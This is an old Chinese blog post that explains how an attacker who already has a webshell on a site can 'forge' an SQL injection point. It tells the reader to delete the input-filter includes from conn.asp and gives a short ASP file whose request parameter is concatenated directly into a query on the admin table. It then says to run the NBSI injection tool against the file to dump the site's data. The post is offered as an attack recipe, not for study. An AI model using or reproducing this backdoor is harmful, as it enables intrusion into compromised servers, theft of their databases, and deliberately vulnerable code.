数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



伪造SQL注入点
樱木花盗 发表于 2006-7-22 15:34:53

伪造SQL注入点

webshell了,可以用它直接连接数据库来执行数据查询,不用再伪造注入点文件了,

另外你可以直接修改网站上的原ASP文件,把里面的过滤函数包括语句删除掉就有

注入点了,一般过滤函数都inlcude在数据库连接文件conn.asp文件中.

在目标上先构造一个存在注入点的文件a.asp,里面的admin表是存在的,conn.asp

是数据库连接程序,记得要把conn.asp文件中过滤函数包括语句给删掉,ASP代码如

下:

<!--#i nclude file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL = "select * from admin where id=" & id '如果没有这个admin表,可以自己建立一个表和字段
rs.open strSQL,conn,1,3
rs.close
%>

 

 

然后输入:http://目标IP/a.asp?id=1

完成了,就这么简单,其他的信息就让他全部自己暴露出来吧.打开nbsi,一顿狂注,

什么信息都出来啦,慢慢的浏览着他的目录..


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.